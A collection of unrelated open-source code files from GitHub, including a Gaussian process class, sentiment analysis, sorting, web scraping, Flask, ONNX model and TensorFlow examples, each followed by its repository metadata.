df = 0
for g, c in zip(fdm.grid, fdm.coefs):
df += c * self.shift(-g * fdm.step)
return df / fdm.step ** deriv
@property
def stationary(self):
"""Stationarity of the GP."""
return self.kernel.stationary
@property
def var(self):
"""Variance of the GP."""
return self.kernel.var
@property
def length_scale(self):
"""Length scale of the GP."""
return self.kernel.length_scale
@property
def period(self):
"""Period of the GP."""
return self.kernel.period
def __str__(self):
return self.display()
def __repr__(self):
return self.display()
def display(self, formatter=lambda x: x):
"""Display the GP.
Args:
formatter (function, optional): Function to format values.
Returns:
str: GP as a string.
"""
return 'GP({}, {})'.format(self.kernel.display(formatter),
self.mean.display(formatter))
PromisedGP.deliver(GP)
| pb593/stheno | stheno/graph.py | graph.py | py | 27,441 | python | en | code | null | github-code | 36 |
70231595624 | '''
Name: Main file for HW2 of FE 595
Intro: This file should load the cleaned data from theyfightcrime.org, sort the data, and return the required info.
Author: William Long
Date : 09/22/2019
'''
import pandas as pd
import numpy as np
from textblob import TextBlob
import nltk
#First, Let's load the data
m_raw = pd.read_csv('Male_full.txt', names=["male"], sep='\t')
f_raw = pd.read_csv('Female_full.txt', names=["female"], sep='\t')
# We need to get the sentiment.
def char_sent(text):
'''
This fun should take in some text, and return the sentiment polarity using textblob
:param text: String
:return: sent, float
'''
sent = TextBlob(text).sentiment.polarity
return sent
# Let's add the sentiment in
m_raw["sentiment"] = m_raw.apply(lambda row: char_sent(row["male"]), axis=1)
f_raw["sentiment"] = f_raw.apply(lambda row: char_sent(row["female"]), axis=1)
# Let's sort and return the values we want.
m_sort = m_raw.sort_values(by=["sentiment"])
f_sort = f_raw.sort_values(by=["sentiment"])
m_best = m_sort.tail(10)
f_best = f_sort.tail(10)
m_worst = m_sort.head(10)
f_worst = f_sort.head(10)
# Let's make a list of all the descriptors.
des = []
for i in range(len(m_raw["male"])):
tokens = nltk.word_tokenize(m_raw["male"][i])
tags = nltk.pos_tag(tokens)
a = [wt[0] for wt in tags if wt[1] == 'JJ']
des.extend(a)
for i in range(len(f_raw["female"])):
tokens = nltk.word_tokenize(f_raw["female"][i])
tags = nltk.pos_tag(tokens)
a = [wt[0] for wt in tags if wt[1] == 'JJ']
des.extend(a)
# We just need to do the last part.
word_dist = nltk.FreqDist(des)
top_words = word_dist.most_common(10)
top_words_df = pd.DataFrame(top_words, columns=["Word", "Count"])
# Save the data.
m_best.to_csv(r'Male_Best.csv', index=None, header=True, sep=';')
f_best.to_csv(r'Female_Best.csv', index=None, header=True, sep=';')
m_worst.to_csv(r'Male_Worst.csv', index=None, header=True, sep=';')
f_worst.to_csv(r'Female_Worst.csv', index=None, header=True, sep=';')
top_words_df.to_csv(r'Top_Words.csv', sep=';', index=None, header=True)
| bluefinch83/FE_595_HW2 | Main.py | Main.py | py | 2,099 | python | en | code | 0 | github-code | 36 |
3269577614 | def main():
print("Result-> "+str(quicksort([2, 7, 9, 3, 1, 6, 5, 4])))
def quicksort(arr):
pivot = arr[len(arr)-1]
wall = 0
for i in range(len(arr)):
if arr[i] < pivot:
swap_elements(arr, wall, i)
wall += 1
# switch the pivot with the first element on the right side of the wall
if wall < len(arr)-1:
swap_elements(arr, wall, len(arr)-1)
wall+=1
left = arr[:wall]
right = arr[wall:]
# Do not remove the if statements, else recursion hell :)
if len(left) > 1:
arr[:wall] = quicksort(left)
if len(right) > 1:
arr[wall:] = quicksort(right)
return arr
def swap_elements(arr, wall, i):
buffer = arr[wall]
arr[wall] = arr[i]
arr[i] = buffer
if __name__ == "__main__":
main() | VAR-solutions/Algorithms | Sorting/quickSort/python/quick_sort.py | quick_sort.py | py | 811 | python | en | code | 733 | github-code | 36 |
4394037963 | # 스티커 모으기(2)
# r1 x
# https://programmers.co.kr/learn/courses/30/lessons/12971
# https://inspirit941.tistory.com/158
def solution(sticker):
answer = 0
if len(sticker) == 1:
return sticker[0]
dp = [0 for _ in range(len(sticker))]
dp[0] = sticker[0]
dp[1] = dp[0]
for i in range(2, len(sticker) - 1):
dp[i] = max(dp[i - 1], dp[i - 2] + sticker[i])
dp2 = [0 for _ in range(len(sticker))]
dp2[0] = 0
dp2[1] = sticker[1]
for i in range(2, len(sticker)):
dp2[i] = max(dp2[i - 1], dp2[i - 2] + sticker[i])
answer = max(max(dp), max(dp2))
return answer | sjjam/Algorithm-Python | programmers/level/L3/12971.py | 12971.py | py | 645 | python | en | code | 0 | github-code | 36 |
23188615876 | import visualization
import ROOT as root
from detector import Detector
tracking_file_name = "../../build/output/pgun/klong/stat0.root"
tracking_file = root.TFile.Open(tracking_file_name)
tree = tracking_file.Get("integral_tree")
LAYERS_Y=[[6001.0, 6004.0], [6104.0, 6107.0]]
det = Detector()
count = [0. for i in range(6)]
total = [0. for i in range(6)]
for event_number in range(int(tree.GetEntries())):
tree.GetEntry(event_number)
#we can add some cuts here if we would like
if (tree.NumTracks < 2):
continue
if tree.NumVertices < 1:
continue
veto = False
for hit_y in tree.Digi_y:
layer = det.inLayer(hit_y)
if layer == 1 or layer == 0:
veto = True
continue
if veto:
continue
# nlayers = det.nLayersWHit(tree.Hit_y)
# if nlayers < 2:
# continue
# total[nlayers-2] += 1.
# if (tree.NumTracks >0 ):
# count[nlayers-2] += 1.
# continue
event_display = visualization.Display()
for k in range(int(len(tree.Digi_x))):
event_display.AddPoint( [tree.Digi_x[k], tree.Digi_y[k], tree.Digi_z[k], tree.Digi_energy[k]] )
# event_display.AddPoint( [tree.Vertex_x[0], tree.Vertex_y[0], tree.Vertex_z[0], tree.Vertex_t[0]], "*" )
for k in range(int(tree.NumTracks)):
x0, y0, z0, t0 = tree.Track_x0[k], tree.Track_y0[k], tree.Track_z0[k], tree.Track_t0[k]
vx, vy, vz = tree.Track_velX[k], tree.Track_velY[k], tree.Track_velZ[k]
event_display.AddTrack(x0, y0, z0, vx, vy, vz, t0)
event_display.Draw_NoTime( "event " + str(event_number), "event" + str(event_number) + ".png" )
print(total)
_sum = 0.
for i in total:
_sum += i
_count = 0.
for i in count:
_count += i
print(_count/_sum)
print([count[i]/total[i] for i in range(len(count))])
| seg188/MATHUSLA-MLTracker | scripts/draw_energy.py | draw_energy.py | py | 1,722 | python | en | code | 1 | github-code | 36 |
19702023558 | from flask import Flask, request, send_from_directory, send_file
from contracts import DCCInterface
from web3 import Web3, HTTPProvider
import json
import _thread
import time
import traceback
app = Flask(__name__)
jobs = []
jobs_details = []
web3 = Web3([HTTPProvider("http://10.8.3.1:8545")])
def thread_prune_entries():
global jobs
global jobs_details
while True:
print ("Pruning entires!")
new_jobs = []
new_jobs_details = []
for j in jobs:
try:
iface = DCCInterface(web3, j)
new_jobs_details.append({
'id': j,
'owner': iface.get_owner(),
'in_progress': 'Ongoing' if iface.get_in_progress() else 'Completed/Failed',
'price': iface.get_price()
})
if iface.get_in_progress():
new_jobs.append(j)
except Exception:
traceback.print_exc()
jobs = new_jobs
jobs_details = new_jobs_details
time.sleep(5)
@app.route('/')
def index():
return send_file('../public/index.html')
@app.route('/<path:filename>')
def default(filename):
return send_from_directory('../public', filename)
@app.route('/api/jobs')
def get_jobs():
return json.dumps(jobs)
@app.route('/api/addjob', methods=['POST'])
def add_job():
try:
contract_id = request.data.decode('utf-8')
if contract_id in jobs:
raise Exception
jobs.append(contract_id)
return 'ok'
except:
traceback.print_exc()
return 'fail'
if __name__ == '__main__':
_thread.start_new_thread(thread_prune_entries, ())
app.run(host="0.0.0.0")
| jimgao1/dcc | src/server.py | server.py | py | 1,747 | python | en | code | 0 | github-code | 36 |
4828550972 | from concurrent.futures import process
from matplotlib.pyplot import cla
import numpy as np, pandas as pd
import re
from scipy import rand
dataset = pd.read_csv("../../resources/Part 7 - Natural Language Processing/Section 36 - Natural Language Processing/Python/Restaurant_Reviews.tsv",delimiter="\t", quoting=3)
## cleaning text
def cleanseText(sentence, stopwordSet, porterStemmerFunction):
processedText = re.sub('[^a-zA-Z]',' ',sentence) ## replace non letter characters with space
processedText = (processedText.lower()).split() ## convert sentence to list of words to process next few steps easily
processedText = [porterStemmerFunction.stem(word) for word in processedText if not word in stopwordSet] ## if not a stop-word, then stem the word
processedText = ' '.join(processedText) ## convert list back to sentence
return processedText
def bayesClassifier(x_train, y_train):
from sklearn.naive_bayes import GaussianNB
classifier = GaussianNB()
classifier.fit(x_train, y_train)
return classifier
def logisticRegression(x_train, y_train):
from sklearn.linear_model import LogisticRegression
classifier = LogisticRegression(random_state=0)
classifier.fit(x_train,y_train)
return classifier
def dt(x_train, y_train):
from sklearn.tree import DecisionTreeClassifier
classifier = DecisionTreeClassifier(random_state=0)
classifier.fit(x_train, y_train)
return classifier
def svm(x_train, y_train):
from sklearn.svm import SVC
classifier = SVC(kernel='linear',random_state=0)
classifier.fit(x_train, y_train)
return classifier
def nonlinearsvm(x_train, y_train):
from sklearn.svm import SVC
classifier = SVC(kernel='rbf',random_state=0)
classifier.fit(x_train, y_train)
return classifier
def knn(x_train, y_train):
from sklearn.neighbors import KNeighborsClassifier
classifier = KNeighborsClassifier(n_neighbors=5, metric='minkowski', p=2)
classifier.fit(x_train, y_train)
return classifier
import nltk
nltk.download('stopwords') ## stopwords are not useful for computation (like 'the', 'a', 'an')
from nltk.corpus import stopwords
from nltk.stem.porter import PorterStemmer
corpus = []
num_reviews = 1000
stopwords_list = set(stopwords.words('english'))
stopwords_list.remove('not')
stopwords_set = set(stopwords_list)
ps = PorterStemmer() ## import word stemmer -> this bunches up tenses of the same word (for eg. like and liked are the same word)
for uncleanedReview in range(0,num_reviews):
review = cleanseText(dataset['Review'][uncleanedReview],stopwords_set,ps)
corpus.append(review) ## append the cleaned sentence to the corpus
## Bag of words model
from sklearn.feature_extraction.text import CountVectorizer
cv = CountVectorizer(max_features = 1500)
x = cv.fit_transform(corpus).toarray()
y = dataset.iloc[:,-1].values
## split into train and test set
from sklearn.model_selection import train_test_split
x_train, x_test, y_train, y_test = train_test_split(x,y,test_size=0.2,random_state=0)
cmlist = []
accuracylist = []
precisionlist = []
recalllist = []
f1scorelist = []
from sklearn.metrics import confusion_matrix, accuracy_score
for classifyingFunction in [bayesClassifier, logisticRegression, dt, svm, nonlinearsvm, knn]:
classifier = classifyingFunction(x_train, y_train)
y_pred = classifier.predict(x_test)
#y_list = np.concatenate((y_pred.reshape(len(y_pred),1),y_test.reshape(len(y_test),1)),axis=1)
#print(y_list)
cm = confusion_matrix(y_test, y_pred)
cmlist.append(cm)
accuracy = accuracy_score(y_test, y_pred)
accuracylist.append(accuracy)
precision = cm[0][0] / (cm[0][0] + cm[1][0])
precisionlist.append(precision)
recall = cm[0][0] / (cm[0][0] + cm[0][1])
recalllist.append(recall)
f1score = 2*precision*recall / (precision + recall)
f1scorelist.append(f1score)
for i in range(0,len(cmlist)):
print(cmlist[i])
print(accuracylist[i],precisionlist[i],recalllist[i],f1scorelist[i]) | ManishLapasi/MLstuff | models/NLP/nlpselect.py | nlpselect.py | py | 4,084 | python | en | code | 0 | github-code | 36 |
12029446848 | #!/usr/bin/env python3.8
how_many_prime = int(input("How many prime numbers would you like to see? "))
def natural_num(num: int)-> int:
yield num
yield from natural_num(num+1)
def sieve(s: int)-> int:
n = next(s)
yield n
yield from sieve(i for i in s if i%n!=0)
p = sieve(natural_num(2))
for _ in range(how_many_prime):
print(next(p))
| NateDreier/Learn_Python | independent_learning/random_proj/lazy_prime.py | lazy_prime.py | py | 364 | python | en | code | 0 | github-code | 36 |
14873664547 | import cv2
import yaml
from application.main.onnx_model.base_model import BaseModel
from typing import Tuple
from application.main.onnx_model.util import *
class YoloOnnxModel(BaseModel):
def __init__(self, cfg_file):
super(YoloOnnxModel, self).__init__(cfg_file)
self.input_nodes = ["images"]
self.input_width, self.input_height = self.input_size
def preprocess(self, input_img: np.ndarray):
img = cv2.resize(input_img, dsize=self.input_size)
input_image = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
input_image = input_image.astype(np.float32)
input_image /= 255.0
image1 = np.transpose(input_image, (2, 0, 1)) # HWC -> CHE
data = image1[np.newaxis, ...].astype(np.float32) # 1 x CHW
inputs = {self.input_nodes[0]: data}
return inputs
def run(self, input_img: np.ndarray):
origin_h, origin_w, _ = input_img.shape
inputs = self.preprocess(input_img)
outputs = self.model.run(self.output_nodes, inputs)
outputs = self.postprocess(outputs[0][0], origin_shape=(origin_w, origin_h))
return outputs
def postprocess(self, model_outputs, origin_shape: Tuple[int, int]):
origin_w, origin_h = origin_shape
nms_output = nms(model_outputs, self.param["conf_threshold"], self.param["iou_threshold"])
nms_output[:, 0] *= origin_w / self.input_width
nms_output[:, 1] *= origin_h / self.input_height
nms_output[:, 2] *= origin_w / self.input_width
nms_output[:, 3] *= origin_h / self.input_height
return nms_output
def __call__(self, img: np.ndarray, *args, **kwargs):
return self.run(img)
def get_iou_threshold(self):
return self.param["iou_threshold"]
def set_iou_threshold(self, value):
if 0 <= value <= 1:
self.param["iou_threshold"] = value
return True
return False
def get_conf_threshold(self):
return self.param["get_conf_threshold"]
def set_conf_threshold(self, value):
if 0 <= value <= 1:
self.param["set_conf_threshold"] = value
return True
return False
| YoungHyuenKim/onnx_fastAPI_example | application/main/onnx_model/yolo_model.py | yolo_model.py | py | 2,184 | python | en | code | 0 | github-code | 36 |
21645118091 | from datetime import date, datetime, timezone, timedelta
import threading
import git
import os
from repoorgui.commands import commandfn
# see https://stackoverflow.com/a/39956572
# made changes to return repo object if exits
def is_git_repo(path):
try:
r = git.Repo(path)
_ = r.git_dir
return True, r
except git.exc.InvalidGitRepositoryError:
return False, None
def getRemoteIfExits(repo):
try:
return repo.remote()
except ValueError as ve:
return None
def getRemoteUrl(remote):
if remote:
return next(remote.urls)
else:
return None
# 0 for all
# TODO: there is a division by 0 below for _limit=0
# needs to be fixed.
# for now setting this to a large number
_limit = 1000
def commit_days_text(numdays):
try:
if numdays == 0:
return "today"
elif numdays == 1:
return "yesterday"
elif numdays > 1:
return str(numdays) + " days ago"
except TypeError as te:
return "invalid"
def getReposList(updateFunc=None, appstate=None):
table_rows = []
_now = datetime.now()
_td_one_day = timedelta(days=1)
_completion = 0
if updateFunc:
updateFunc(_completion)
# Get all the subdirectories of the repo parent path (might call this workspace folder).
_, all_subdirs, other_files = next(os.walk(appstate.workspace_folder))
# getting the dirs is 10% progress
if updateFunc:
_completion = 10
updateFunc(_completion)
# checking if the repos are git repos and populating repo object
# is 80% of the progress
_loading_total_progress = 90.0
_count = 0
_total = len(all_subdirs)
_item_progress = _loading_total_progress / \
(_limit if _total > _limit else _total)
# print('total = ', str(_total), ' item progress = ', str(_item_progress))
for dir in all_subdirs:
if _limit > 0:
_count += 1
if _limit > 0 and _count >= _limit:
if updateFunc:
_completion += _item_progress
updateFunc(_completion)
break
dir_abspath = os.path.abspath(
os.path.join(appstate.workspace_folder, dir))
flag, repo = is_git_repo(dir_abspath)
if flag:
remote_url = str(getRemoteUrl(getRemoteIfExits(repo)))
last_commit_datetime = '-'
days_since_last_commit = '-'
try:
last_commit_datetime = str(repo.head.commit.committed_datetime)
td_since_last_commit = _now - \
repo.head.commit.committed_datetime.replace(tzinfo=None)
# print(td_since_last_commit)
days_since_last_commit, _ = divmod(
td_since_last_commit, _td_one_day)
# print(days_since_last_commit)
except ValueError as ve:
# print(ve)
pass
appstate.workspace_repos[dir] = (
repo, remote_url, last_commit_datetime, commit_days_text(days_since_last_commit))
if updateFunc:
_completion += _item_progress
updateFunc(_completion)
# Create repository table
for repo_dir, (repo, remote_url, last_commit_datetime, days_since_last_commit) in appstate.workspace_repos.items():
table_rows.append([
str(repo_dir), str(repo.working_dir), remote_url, days_since_last_commit
])
# creating the repo table with details is 10% progress
if updateFunc:
_completion = 100
updateFunc(_completion)
return table_rows
def updateReposListWindow(window, appstate):
window.write_event_value('-START-LOADING-PROGRESS-', None)
table_rows = getReposList(lambda progress: window.write_event_value(
'-UPDATE-LOADING-PROGRESS-', progress), appstate)
window.write_event_value('-UPDATE-REPOS-LIST-', table_rows)
window.write_event_value('-DONE-LOADING-PROGRESS-', None)
@commandfn
def cmd_long_update_repos(window, event, values, appstate=None):
if appstate and values and values['workspace_folder'] != appstate.workspace_folder:
appstate.workspace_folder = values['workspace_folder']
appstate.workspace_repos = {}
threading.Thread(target=updateReposListWindow,
args=(window, appstate, ), daemon=True).start()
| abhishekmishra/repoorgui | src/repoorgui/gitworkspace.py | gitworkspace.py | py | 4,397 | python | en | code | 0 | github-code | 36 |
21520280572 | """
VATSIM Status Proxy
Copyright (C) 2017 - 2019 Pedro Rodrigues <prodrigues1990@gmail.com>
This file is part of VATSIM Status Proxy.
VATSIM Status Proxy is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, version 2 of the License.
VATSIM Status Proxy is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with VATSIM Status Proxy. If not, see <http://www.gnu.org/licenses/>.
"""
import os
from copy import copy
default = {
'schema': {},
'allow_unknown': True,
'resource_methods': ['GET'],
'item_methods': ['GET'],
'pagination': False
}
clients_schema = {
'callsign': {
'type': 'string',
'unique': True
},
'cid': {'type': 'string'},
'realname': {'type': 'string'},
'clienttype': {'type': 'string'},
'location': {'type': 'point'},
'groundspeed': {'type': 'number'},
'altitude': {'type': 'number'},
'boundaries': {
'type': 'objectid',
'required': False,
'data_relation': {
'resource': 'firs',
'field': '_id',
'embeddable': True
},
},
}
clients = {
'schema': clients_schema,
'allow_unknown': True,
'resource_methods': ['GET'],
'item_methods': ['GET'],
'pagination': False,
'mongo_indexes': {
'location_2d': [ ('location', '2d') ],
'location_2dsphere': [ ('location', '2dsphere') ],
'callsign_text': [ ('callsign', 'text') ]
}
}
firs_schema = {
'icao': {
'type': 'string'
},
'name': {'type': 'string'},
'location': {'type': 'point'},
'boundaries': {'type': 'polygon'},
'callsigns': {
'type': 'list',
'schema': {'type': 'string'}
}
}
firs = {
'schema': firs_schema,
'resource_methods': ['GET', 'POST'],
'item_methods': ['GET', 'PATCH', 'PUT'],
'pagination': False
}
data_version = {
'schema': {},
'internal_resource': True
}
DOMAIN = {
'voice_servers': copy(default),
'clients': clients,
'servers': copy(default),
'prefiles': copy(default),
'firs': firs,
'dataversion': data_version
}
# We want to seamlessy run our API both locally and on Heroku. If running on
# Heroku, sensible DB connection settings are stored in environment variables.
MONGO_HOST = os.environ.get('MONGO_HOST', 'localhost')
MONGO_PORT = int(os.environ.get('MONGO_PORT', 27017))
MONGO_USERNAME = os.environ.get('MONGO_USERNAME', '')
MONGO_PASSWORD = os.environ.get('MONGO_PASSWORD', '')
MONGO_DBNAME = os.environ.get('MONGO_DBNAME', 'vatsim-status-proxy')
X_DOMAINS = '*'
DATE_FORMAT = '%Y-%m-%dT%H:%M:%S.%fZ'
MONGO_QUERY_BLACKLIST = ['$where', '$regex']
| pedro2555/vatsim-status-proxy | settings.py | settings.py | py | 2,875 | python | en | code | 2 | github-code | 36 |
72054157543 | # Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
# useful for handling different item types with a single interface
from datetime import datetime
from urllib.parse import urljoin
import pymongo
import scrapy
import scrapy.exceptions as scrapy_exceptions
from itemadapter import ItemAdapter
from scrapy.pipelines.images import ImagesPipeline
class GetchuPipeline:
def process_item(self, item, spider):
return item
class MongoUpsertPipeline:
mongo_collection_name = "items"
def __init__(self, mongo_uri, mongo_db, mongo_collection_name):
self.mongo_uri = mongo_uri
self.mongo_db = mongo_db
self.mongo_collection_name = mongo_collection_name
@classmethod
def from_crawler(cls, crawler):
return cls(
mongo_uri=crawler.settings.get("MONGO_URI"),
mongo_db=crawler.settings.get("MONGO_DATABASE"),
mongo_collection_name=crawler.settings.get("MONGO_COLLECTION_NAME"),
)
def open_spider(self, spider):
self.client = pymongo.MongoClient(self.mongo_uri)
self.db = self.client[self.mongo_db]
def close_spider(self, spider):
self.client.close()
def process_item(self, item, spider):
itemAd = ItemAdapter(item)
itemAd['updated_at'] = datetime.now()
if not itemAd.get('getchu_id'):
raise scrapy_exceptions.CloseSpider('insert db error,not getchu_id provide')
self.db[self.mongo_collection_name].update_one(
{'getchu_id': itemAd.get('getchu_id')},
{'$set': itemAd.asdict()},
upsert=True,
)
# self.db[self.collection_name].insert_one(ItemAdapter(item).asdict(),)
return item
class MyImagesPipeline(ImagesPipeline):
def get_media_requests(self, item, info):
# print('enter image pipeline')
adapter = ItemAdapter(item)
# 只下载game分类
if adapter.get('tab_type') == 'game':
url_list = []
cover_url = adapter.get('cover_url')
if cover_url:
url_list.append(cover_url)
cover_url_hd = adapter.get('cover_url_hd')
if cover_url_hd:
url_list.append(cover_url_hd)
# 样品图片
sample_img_list = adapter.get('sample_img_list')
if sample_img_list:
url_list += sample_img_list
# 角色图片
chara_list = adapter.get('chara_list')
if chara_list:
for chara in chara_list:
img = chara['img']
img_whole = chara['img_whole']
if img:
url_list += [img]
if img_whole:
url_list += [img_whole]
# print(f'urllist:{url_list}')
for url in url_list:
yield scrapy.Request(
urljoin('https://www.getchu.com', url),
headers={
'referer': f'https://www.getchu.com/soft.phtml?id={adapter.get("getchu_id")}'
},
meta={'dont_cache': True},
)
def file_path(self, request, response=None, info=None, *, item=None):
getchu_id = item['getchu_id']
origin_filename = request.url.split('/')[-1]
# 目录按照时间来分类
on_sale = item['on_sale']
# 按照年/月/id的文件夹形式归档
datepath = datetime.strptime(on_sale, r'%Y/%m/%d').strftime(r'%Y/%m')
return f'{datepath}/{getchu_id}/{origin_filename}'
def item_completed(self, results, item, info):
# image_paths = [x["path"] for ok, x in results if ok]
# if not image_paths:
# raise scrapy_exceptions.DropItem("Item contains no images")
return item
| mudssky/myScrapySpiders | getchu/getchu/pipelines.py | pipelines.py | py | 3,959 | python | en | code | 0 | github-code | 36 |
38044872719 | input_file = open("../inputs/day11input.txt", "r")
input_array = []
f = list(input_file.readline())
while f:
f.remove("\n")
input_array.append(f)
f = list(input_file.readline())
for i in range(len(input_array)):
for j in range(len(input_array[i])):
input_array[i][j] = int(input_array[i][j])
# print(input_array)
def short_adding(array, i, j):
array[i][j] = adding_to_nine(array[i][j])
if array[i][j] == 0:
return adding_in_array(array, i, j)
else:
return array
def adding_to_nine(number):
if number+1 == 10:
return 0
return number+1 # xwykle dodawanie tylko do 9 (10 zamienia sie na 0)
def adding_in_array(array, x, y):
if x-1 != -1 and x != len(array)-1 and y != -1 and y != len(array)-1:
for i in range(x-1, x+2):
for j in range(y-1, y+2):
if array[i][j] != 0:
short_adding(array, i, j)
else:
if x == 0 and y == 0:
for i in range(x, x+2):
for j in range(y, y+2):
if array[i][j] != 0:
short_adding(array, i, j)
elif x == len(array)-1 and y == len(array)-1:
for i in range(x-1, x+1):
for j in range(y-1, y+1):
if array[i][j] != 0:
short_adding(array, i, j)
elif x == 0 and y == len(array)-1:
for i in range(x, x+2):
for j in range(y-1, y+1):
if array[i][j] != 0:
short_adding(array, i, j)
elif x == len(array)-1 and y == 0:
for i in range(x-1, x+1):
for j in range(y, y+2):
if array[i][j] != 0:
short_adding(array, i, j)
elif x == 0:
for i in range(x, x+2):
for j in range(y-1, y+2):
if array[i][j] != 0:
short_adding(array, i, j)
elif x == len(array)-1:
for i in range(x-1, x+1):
for j in range(y-1, y+2):
if array[i][j] != 0:
short_adding(array, i, j)
elif y == 0:
for i in range(x-1, x+2):
for j in range(y, y+2):
if array[i][j] != 0:
short_adding(array, i, j)
elif y == len(array)-1:
for i in range(x-1, x+2):
for j in range(y-1, y+1):
if array[i][j] != 0:
short_adding(array, i, j)
return array
def checking_for_zeroes(array):
for i in range(len(array)):
for j in range(len(array[i])):
if array[i][j] == 0:
array = adding_in_array(array, i, j)
return array
def octopus_flashes(array):
flashes = [0 for _ in range(100)]
for step in range(100):
flash = 0
for i in range(len(array)):
for j in range(len(array[i])):
array[i][j] = adding_to_nine(array[i][j])
array = checking_for_zeroes(array)
for i in range(len(array)):
for j in range(len(array[i])):
if array[i][j] == 0:
flash += 1
flashes[step] = flash
return sum(flashes)
print(octopus_flashes(input_array))
| pvtrov/advent-of-code-2021 | day11/1.py | 1.py | py | 3,349 | python | en | code | 0 | github-code | 36 |
30370929393 | import sys
sys.stdin = open('input.txt')
def DFS(start_node, end_node):
to_visits = [start_node]
while to_visits:
current = to_visits.pop()
visited[current] = True
for node in graph[current]:
if visited[node] is False:
visited[node] = True
to_visits += [node]
cnt_graph[node] = 1 + cnt_graph[current]
V = int(input())
x, y = list(map(int, input().split()))
E = int(input())
graph = [[] for _ in range(V+1)]
for _ in range(E):
start, end = map(int, input().split())
graph[start].append(end)
graph[end].append(start)
visited = [False for _ in range(V+1)]
cnt_graph = [0 for _ in range(V+1)]
DFS(x, y)
if cnt_graph[y] >= 1:
print(cnt_graph[y])
else:
print(-1) | pugcute/TIL | algorithm/2644_촌수계산/2644.py | 2644.py | py | 775 | python | en | code | 0 | github-code | 36 |
24201123813 | # 백준 부분수열의 합
import sys
N, S = map(int, sys.stdin.readline().split(' '))
arr = list(map(int, sys.stdin.readline().split(' ')))
cnt = 0
visited = [False] * N
def backtracking(size, now_sum):
global cnt
if size == N:
if now_sum == S: cnt += 1
return
backtracking(size+1, now_sum + arr[size])
backtracking(size + 1, now_sum)
backtracking(0, 0)
if S == 0: cnt -= 1
print(cnt)
| superyodi/burning-algorithm | dfs/boj_1182.py | boj_1182.py | py | 430 | python | en | code | 1 | github-code | 36 |
71244709543 | """watch for changes in tiles.yml"""
import hashlib
import os
from src.config_parser import ConfigFile
from src.template import create_all_tiles
from src.tilefy_redis import TilefyRedis
class Watcher:
"""watch for changes"""
FILE_PATH = "/data/tiles.yml"
def __init__(self):
self.modified = False
self.hash = False
def watch(self):
"""watch for changes, call from schedule"""
if not os.path.exists(self.FILE_PATH):
return
modified = self.is_changed()
if modified:
print(f"{self.FILE_PATH}: modified")
ConfigFile().load_yml()
create_all_tiles()
self._store_last()
def is_changed(self):
"""check if file has changed"""
self._get_modified()
last = self._get_last()
if not last or not self.modified:
print("create first modified entry")
self._get_hash()
self._store_last()
return False
if self.modified == last["modified"]:
return False
self._get_hash()
if self.hash != last["hash"]:
return True
return False
def _get_modified(self):
"""get last modified timestamp"""
self.modified = int(os.stat(self.FILE_PATH).st_mtime)
def _get_hash(self):
"""get hash of file content"""
with open(self.FILE_PATH, "r", encoding="utf-8") as f:
content = f.read()
self.hash = hashlib.sha1(content.encode()).hexdigest()
def _store_last(self):
"""store last access details in redis"""
message = {
"modified": self.modified,
"hash": self.hash,
}
TilefyRedis().set_message("modified", message)
def _get_last(self):
"""get last stored"""
return TilefyRedis().get_message("modified")
def _del_last(self):
"""remove last item from redis"""
TilefyRedis().del_message("modified")
def watch_yml():
"""watch tiles.yml for changes"""
Watcher().watch()
| bbilly1/tilefy | tilefy/src/watcher.py | watcher.py | py | 2,072 | python | en | code | 16 | github-code | 36 |
34996914416 | import numpy as np
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
from numpy import pi
inputName = "21cylindrov"
fileName = inputName + "-Tphi-all"
plotName = fileName + "-smery"
data = np.load("./Results/"+fileName+".npz")
inputData = np.load("./Inputs/" + inputName + ".npz")
n = inputData['n']
R = inputData['R']
x0 = inputData['x']
y0 = inputData['y']
phi = data['phi']
Tphi = data['Tphi']
frequencies = data['frequencies']
countf = frequencies.size
Rk = data['Rk']
mpl.rcParams['mathtext.fontset'] = 'stix'
mpl.rcParams['font.family'] = 'STIXGeneral'
mpl.rcParams['legend.fontsize'] = 'medium'
mpl.rcParams['axes.labelsize'] = 'large'
for uhol in range(90,360,180):
plt.plot(frequencies, 2*pi/countf * Tphi[:,uhol]*(1+uhol/1000.), label = "%d" %(uhol) )
#plt.ylim(bottom=1e-6)
plt.legend(loc=4)
#plt.yscale("log")
plt.savefig("./"+plotName+".pdf")
#plt.show ()
| KlaraFickova/Diplomovka | Draw/smery-f.py | smery-f.py | py | 919 | python | en | code | 0 | github-code | 36 |
38799414939 | import discord
import bdg
import gamelist
import random
class SurpriseGameCommand(bdg.BdgCommand):
header = {
'name': "sortear_jogo",
'description': "Lista de Jogos - Sorteie um jogo aleatório baseado no filtro especificado",
}
async def on_command(self, i: discord.Interaction, filtro: gamelist.GameFilter):
gamelist = self.bdg.get_gamelist(self.bdg.guild_collection(i.guild))
available_games = [ g for g in gamelist.filter(filtro) ]
if len(available_games) <= 0:
await i.response.send_message(":warning: | Não há nenhum jogo disponível com esse filtro", ephemeral=True)
return
game_index = available_games[ random.randint(0, len(available_games) - 1) ]
game = gamelist[game_index]
await i.response.send_message(f":tada: | O jogo sorteado é... ||**{game.name.upper()}!**||")
| DanielKMach/BotDusGuri | src/commands/gamelist/surprise.py | surprise.py | py | 814 | python | pt | code | 1 | github-code | 36 |
44396010983 | import tensorflow as tf
import os
import cProfile
def variable_turn_off_gradient():
step_counter = tf.Variable(1, trainable=False)
print(step_counter)
def variable_placing():
with tf.device('CPU:0'):
# Create some tensors
a = tf.Variable([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
b = tf.constant([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]])
c = tf.matmul(a, b)
print(c)
if __name__ == '__main__':
"""
recommended way to represent shared, persistent state your program manipulates
Higher level libraries like tf.keras use tf.Variable to store model parameters
A variable looks and acts like a tensor, and, in fact, is a data structure backed by a tf.Tensor
"""
my_tensor = tf.constant([[1.0, 2.0], [3.0, 4.0]])
my_variable = tf.Variable(my_tensor)
print("Shape: ", my_variable.shape)
print("DType: ", my_variable.dtype)
print("As NumPy: ", my_variable.numpy())
print("\nViewed as a tensor:", tf.convert_to_tensor(my_variable))
